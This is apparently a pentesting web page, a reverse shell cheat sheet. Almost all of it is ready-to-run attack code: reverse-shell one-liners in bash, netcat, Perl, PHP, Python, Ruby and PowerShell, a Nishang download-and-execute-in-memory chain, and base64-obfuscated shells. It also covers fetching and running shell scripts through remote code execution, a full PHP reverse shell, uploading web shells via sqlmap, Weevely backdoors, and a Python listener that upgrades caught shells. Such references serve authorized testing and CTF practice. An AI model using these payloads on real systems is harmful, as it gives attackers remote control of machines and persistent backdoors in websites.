Exploit Notes

Reverse Shell Cheat Sheet

Last modified: 2023-03-10

Tags: Privilege Escalation, Reverse Shell, Windows


First of all, start a listener on the local machine to catch the incoming connection.

nc -lvnp 4444

Cheat Sheets

Bash

bash -i >& /dev/tcp/ 0>&1
bash -c 'bash -i >& /dev/tcp/ 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'

# For URL param: percent-encode & as %26 and > as %3E (spaces as %20), otherwise the query string is cut at the first &

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

Ncat

ncat 4444 -e /bin/bash
ncat 4444 -e /bin/sh
ncat 4444 -c bash
ncat --udp 4444 -e /bin/bash

Netcat Traditional

nc 4444 -e /bin/bash
nc 4444 -e /bin/sh
nc 4444 -c bash
nc --udp 4444 -e /bin/bash

Perl

perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Script File

    To run it from a file instead of a one-liner, put the same code in a Perl script and pass it to the perl binary.

    # shell.pl
    use Socket;
    $i = "";    # local IP
    $p = 4444;  # local port
    socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
    if (connect(S, sockaddr_in($p, inet_aton($i)))) {
        # Point stdin/stdout/stderr of this process at the socket, then exec a shell
        open(STDIN, ">&S");
        open(STDOUT, ">&S");
        open(STDERR, ">&S");
        exec("/bin/sh -i");
    }

    Then run perl.

    perl ./shell.pl


PHP

php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'


Python

python -c 'import socket,os,pty;s=socket.socket();s.connect(("", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'


Ruby

ruby -rsocket -e'f=TCPSocket.open("",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


Nishang

Nishang is a collection of offensive PowerShell scripts for red teaming and penetration testing.

  1. Preparing the Payload on Your Local Machine

    First, copy the payload to the current working directory.

    cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
    mv Invoke-PowerShellTcp.ps1 shell.ps1

    Append the following line to the end of the payload (shell.ps1) so the function is called as soon as the script is loaded.

    Invoke-PowerShellTcp -Reverse -IPAddress <your-local-ip> -Port 4444
  2. Opening a Web Server on Your Local Machine

    To let the target download the payload, start a web server on your local machine.

    python3 -m http.server 8000
  3. Downloading the Payload and Executing the Reverse Shell

    On the target machine, download the locally hosted payload and run it in memory.

    cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')

Reverse Shell with Base64

First, base64-encode the reverse shell command.

echo -n 'bash -i >& /dev/tcp/ 0>&1' | base64

Then paste the base64 text into a wrapper that decodes it and pipes it to bash.

echo -n "<Base64>" | base64 -d | bash

Reverse Shell over Websites

Shell Script & Remote Code Execution (RCE)

If we find a website vulnerable to Remote Code Execution but cannot get a reverse shell directly (for example because the one-liner's special characters get mangled on the way), we may still get one by uploading a script and executing it.

  1. Create a shell script for the reverse shell.

    This file is named "revshell.sh".

    #!/bin/bash
    bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
  2. Upload the script to the website

    Start a web server on the local machine to serve the script.

    python3 -m http.server 8000

    Then fetch it onto the target through the remote code execution.

    https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
    # or (curl needs -O, otherwise the file is only printed, not saved)
    https://vulnerable.com/?cmd=curl -O http://<local-ip>:8000/revshell.sh

    To confirm the script was uploaded, execute the following RCE.

  3. Get a shell

    Start a listener on the local machine.

    nc -lvnp 4444

    Now execute the uploaded script via RCE.

    # 1. Make the script executable
    https://vulnerable.com/?cmd=chmod 777 revshell.sh
    # 2. Execute the script

    We should now have a shell on the target.

PHP Reverse Shell

pentestmonkey's php-reverse-shell is a well-known payload for websites running PHP.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Update `$ip` and `$port` in the payload to your local ip and port.
Then upload the payload (or paste its contents into an existing PHP file on the target) and request the page to trigger it.

PHP Reverse Shell (without fsockopen, and for FreeBSD)

<?php
set_time_limit(0);
$ip = '';          // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr is appended to a file
);

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    // Double quotes so $ip and $port are interpolated; the trailing newline makes sh run the line
    fwrite($pipes[0], "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f\n");
    fclose($pipes[0]);  // send EOF so sh exits once the pipeline ends

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}

PHP Reverse Shell for Windows

We can get the payload here.

Upload the Payload using SQLi

# req.txt: the request saved from Burp Suite
# --file-write: local file to upload, --file-dest: absolute path on the target
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

This relies on sqlmap's file-write support, so the database user needs write-to-disk privileges (e.g. the MySQL FILE privilege with secure_file_priv not blocking the target directory) and the web root must be writable by the database process.

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      Choose a password; it is required for every later connection to the backdoor.

      weevely generate <password> ./shell.php
    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami
    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>


Pwncat

pwncat (pwncat-cs) is a reverse and bind shell handler that automates post-connection tasks such as the TTY upgrade and file transfer.

To listen for the incoming connection, run the following command.

pwncat-cs -lp 4444

Commands in Pwncat Shell

Once the target connects back, we can run commands on either the local or the remote side.

# Switch between the local (pwncat) prompt and the remote shell: press Ctrl-D

# Upload a file to the target machine (e.g. upload example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt

Upgrade to a Full Functional Shell

After catching a reverse shell, it is recommended to upgrade it to a fully interactive TTY; without one, tab completion, job control and programs such as su, vim or less do not work properly.

SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Then press Ctrl+Z to background the shell and run the following on the local machine, which stops the local terminal from interpreting keystrokes (so Ctrl+C reaches the remote shell instead of killing the listener) and restores the session.

stty raw -echo; fg
# press Enter twice
export TERM=xterm
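The same upgrade can be done by the listener itself. The script below is an added example, not the page's own code and not pwncat: it accepts one reverse shell, sends the pty.spawn, TERM and stty lines from above to the target, and puts the local terminal into raw mode with termios, which is what the Ctrl+Z / stty raw -echo / fg sequence does by hand. It assumes a Linux target with python3 and /bin/bash, a Linux or macOS machine with a real terminal on the listening side, and port 4444.

```python
"""Added example (not from the page): a listener that performs the TTY upgrade.

Assumptions: Linux target with python3 and /bin/bash; the listener runs on a
POSIX box with a real terminal; port 4444 is a placeholder.
"""
import os
import select
import shutil
import socket
import sys
import termios
import tty


def upgrade_script(rows: int, cols: int, term: str = "xterm") -> str:
    """Commands sent to the freshly connected dumb shell.

    Same steps as the manual recipe: spawn a pty so job control, tab completion
    and Ctrl+C work, then set TERM and the window size so full-screen programs
    (vim, less, top) know the terminal geometry.
    """
    return (
        'python3 -c \'import pty; pty.spawn("/bin/bash")\'\n'
        f"export TERM={term}\n"
        f"stty rows {rows} cols {cols}\n"
    )


def relay(conn: socket.socket) -> None:
    """Put the local terminal in raw mode (what `stty raw -echo` does by hand) and
    copy bytes between it and the socket until either side closes.

    In raw mode, Ctrl+C and Ctrl+Z are no longer interpreted locally; they travel
    to the remote pty, which is exactly what the manual upgrade achieves.
    """
    stdin_fd = sys.stdin.fileno()
    saved = termios.tcgetattr(stdin_fd)
    tty.setraw(stdin_fd)
    try:
        while True:
            readable, _, _ = select.select([conn, stdin_fd], [], [])
            if conn in readable:
                data = conn.recv(4096)
                if not data:  # remote shell exited
                    break
                os.write(sys.stdout.fileno(), data)
            if stdin_fd in readable:
                data = os.read(stdin_fd, 4096)
                if not data:  # local stdin closed
                    break
                conn.sendall(data)
    finally:
        termios.tcsetattr(stdin_fd, termios.TCSADRAIN, saved)  # restore the terminal


def serve(port: int = 4444) -> None:
    """Accept one reverse shell, send the upgrade commands, then hand over the terminal."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        print(f"[*] listening on 0.0.0.0:{port}", file=sys.stderr)
        conn, addr = srv.accept()
        with conn:
            print(f"[+] connection from {addr[0]}:{addr[1]}", file=sys.stderr)
            size = shutil.get_terminal_size()
            conn.sendall(upgrade_script(size.lines, size.columns).encode())
            relay(conn)


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 4444)
```

Run it in place of `nc -lvnp 4444`; the target-side one-liner is unchanged. The session ends when the remote shell exits, and the local terminal settings are restored in the finally block even if the connection drops mid-session. If python3 is missing on the target, replace the first line of upgrade_script with `SHELL=/bin/bash script -q /dev/null` as on the cheat sheet.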
